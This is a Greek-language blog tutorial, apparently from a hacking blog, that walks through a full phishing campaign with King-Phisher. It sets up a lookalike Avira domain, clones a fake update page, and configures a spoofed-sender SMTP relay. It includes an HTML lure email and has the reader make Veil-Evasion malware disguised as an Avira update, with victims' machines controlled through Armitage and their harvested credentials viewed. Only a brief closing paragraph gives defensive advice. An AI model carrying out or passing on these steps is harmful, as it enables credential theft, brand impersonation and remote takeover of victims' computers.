Σε αυτο τον οδηγο θα μαθουμε να χρησιμοποιουμε το εργαλειο King-Phisher και με αυτο να φτιαξουμε μια εκστρατεια ψαρεματος
Τι θα χρειαστειτε;
1.Kali Linux
2.King-Phisher
3.Ενα Domain Name
4.SMTP server
To King-Phisher υπαρχει στην νεα εκδοση του Kali Linux αλλα υπαρχει καποιο προβλημα με τα πακετα εμεις θα το κανουμε εγκατασταση απο την αρχη
οποτε το κατεβαζουμε με την εντολη git clone
ανοιγουμε ενα τερματικο και γραφουμε
cd opt/
ωστε να παμε στον συγκεκριμενο φακελο
git clone https://github.com/securestate/king-phisher.git
το κατεβαζουμε στον συγκεκριμενο φακελο
τωρα μενει να το κανουμε εγκατασταση
οποτε γραφουμε στο τερματικο
king-phisher/tools/install.sh και επιλεγουμε y
οταν τελειωσει η εγκατασταση μας τρεχει αυτοματα o server του king-phisher και εμεις με την εντολη python3 /opt/king-phisher/KingPhisher τρεχουμε τον client
*αν δεν σας εχει ξεκινησει ο server του king-phisher τρεξτε την εντολη
python3 /opt/king-phisher/KingPhisherServer /opt/king-phisher/server_config.yml
η systemctl start king-phisher
*systemctl disable king-phisher ετσι ωστε οταν ξεκινατε τα kali linux και θελετε να τρεξετε τον apache server να μην τρεχει το King-phisher γιατι ακουει στην θυρα 80
το ξεκινατε με
systemctl start king-phisher
επισεις τρεξτε την εντολη leafpad /opt/king-phisher/server_config.yml
και αλλαζουμε την διαδρομη /var/www σε /var/www/html
πχ
ξεκιναμε το king-phisher με την εντολη
python3 /opt/king-phisher/KingPhisher
βαζουμε τα κριτηρια συνδεσης μας αυτα που κανουμε δλδ login στα kali linux
και μας παει εδω για να δημιουργησουμε την εκστρατεια μας
κανουμε μια παυση εδω.......
Πχ η δικια μου εκστρατεια ειναι να κλεψω τα κριτηρια συνδεσης και να μολυνω υπολογιστες
οποτε παω στο hostinger ,φτιαχνω ενα λογαριασμο επιλεγω ενα domain name αναλογα με τι επιθεση θελω να κανω και ανακατευθυνω το domain name στην εξωτερικη μου ip
δειτε σε παλιοτερους οδηγους πως
πχ η ανακατευθυνση
οποτε το domain name μου ειναι avira.hol.es
τωρα εφοσον τα εχετε φτιαξει αυτα συνεχιζουμε με το king-phisher
επιλεγουμε New Campaign
επιλεγουμε next
εδω βαζουμε το ονομα της εκστρατιας μας και την περιγραφη
περιγραφη της ετερειας πχ Avira Antivirus αν θελετε βαζετε τα στοιχεια
και τελος
επιλεγουμε την εκστρατια μας
και βλεπουμε τις ρυθμισεις που πρεπει να βαλουμε για να τρεξει η εκστρατια μας
πριν τις συμπληρωσουμε τρεχουμε την εντολη
git clone https://github.com/nickthesail0r/King-Phisher-Avira-Update.git
με αυτη την εντολη κατεβαζουμε την σελιδα που τροποποιησα εγω για το avira
*αλλαξτε την αναλογα με τις αναγκες σας
με την εντολη
mv '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/failed' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/images' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/include' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/login' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/scan' /var/www/html
μεταφερουμε τα αρχεια στην διαδρομη /var/www/html
αυτο το κανετε και με copy paste πχ
τρεχουμε την εντολη
ls /var/www/html
και πρεπει να εχουμε αυτα τα αρχεια
τωρα πηγαινουμε στο router μας και προωθουμε την θυρα 80 στην εσωτερικη μας ip δειτε παλιοτερους οδηγους πως
πηγαινουμε στο King-Phisher παλι και γραφουμε το domain name μας /login
μετα επιλεγουμε Verify URL
αν ολα ειναι σωστα τοτε
στην συνεχεια μας μενει να ρυθμισουμε τον SMTP server
παταμε εδω και κανουμε εγραφη
μετα επιλεγουμε SMTP και More Settings
σημειωνουμε τα εξεις στοιχεια
δλδ το email σας τον κωδικο και smtp-pulse.com:2525
πηγαινουμε στο King-Phisher και βαζουμε στο Source Email(SMTP)το ιδιο email που φτιαξαμε λογαριασμο στο SendPulse
στο Source Email(MIME) βαζουμε το ψευτικο email αποστολεα
στο Friendly Allias ενα ψευτικο ονομα αποστολεα
και στο Subject To θεμα του email
μετα πηγαινουμε στην καρτελα Edit
και γραφουμε τις εξεις γραμμες
<html>
</body>
<img src="http://avira.hol.es/images/logo.png?id={{ uid }}"/>
<br>
Special offer upgrade for Free your Avira antivirus
<br>
<a href="{{ url.webserver }}">Click Here</a>
<br>
<br>
{{ sender.friendly_alias }}
<br>
<br>
{{ sender.email }}
<br>
{{ tracking_dot_image_tag }}
</body>
</html>
εσεις βαζετε το domain σας στην γραμμη
<img src="http://avira.hol.es/images/logo.png?id={{ uid }}"/>
επιλεγουμε preview θα μας πει να το αποθηκευσουμε και βλεπουμε τι εχουμε φτιαξει
πηγαινουμε παλι στην καρτελα configure και επιλεγουμε την λιστα με τα email που θελουμε να επιτεθουμε
απο το Veil-evasion δημιουργουμε εναν ιο και τον ονομαζουμε Αvira_Antivirus_v3.37.exe
τον μεταφερουμε στην διαδρομη /var/www/html
*δειτε σε προηγουμενους οδηγους πως
στο αρχειο failed θα δειτε το href για να βαλετε την διαδρομη με το domain σας
πχ
μετα ξεκιναμε το armitage και το βαζουμε να ακουει στην θυρα που δημιουργησαμε τον ιο
*μην ξεχασετε να προωθησετε την θυρα στο router
πηγαινουμε μετα στην καρτελα send και επιλεγουμε start
βαζουμε τα στοιχεια
και το King Phisher στελνει το email
στο ηλεκτρονικο ταχυδρομειο του θυματος θα του εμφανιστει αυτο
οταν πατησει στο μνμ θα τον ανακατευθυνει εδω
το θυμα θα βαλει τα κριτηρια συνδεσης του για να κανει login
και θα τον ανακατευθυνει εδω στο ψευτικο update
μετα το ψευτικο σφαλμα
οταν πατησει download και κατεβασει τον ιο τοτε θα τον δειτε σαν slave
στο armitage απο εκει και περα θα μπορειτε να κανετε οτι θελετε στον υπολογιστη του
επιστρεφουμε στο King-Phisher στην καρτελα View Campaign
εδω βλεπουμε το ποσοστο επιτυχειας λειτουργικα κτλ
εδω βλεπουμε την εξωτερικη ip των θυματων email και αν πατησανε στο email που στειλαμε
εδω βλεπουμε ποιος πηγε στην σελιδα ψαρεματος πχ βλεπουμε εξωτερικη ip ,τοποθεσια ,email και απο ποιο προγραμμα περιηγησης μπηκε
τελος βλεπουμε τα κριτηρια συνδεσης του
το King-phisher μπορειτε να το χρησιμοποιησετε και χωρις να στειλετε καποιο email απλα μονο το link του domain σας βεβαια πρεπει να αλλαξετε στο αρχειο server_config.yml
την εξεις γραμμη απο true σε false
Γενικα το King-Phisher ειναι ενα παρα πολυ καλο εργαλειο για να ψαρευετε μαζικα η να μαζευετε διαφορες πληροφοριες αναλογα με τις αναγκες σας
Πως θα προστατευτειτε;
Παντα να κοιτατε το ονομα του Domain πχ στο παραδειγμα της δικιας μου εκστρατιας το πραγματικο ειναι www.avira.com και το δικο μου ειναι www.avira.hol.es
Αν δεν ειστε σιγουροι για την προελευση ενος μηνυματος η μιας ιστοσελιδας απλα μην την επισκευθειτε η βαλτε λανθασμενα στοιχεια συνδεσεις πχ αν βαλετε λανθασμενα στοιχεια συνδεσεις και δεν σας πει οτι ειναι λαθος τοτε ειναι σελιδα ψαρεματος....απλη λογικη
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου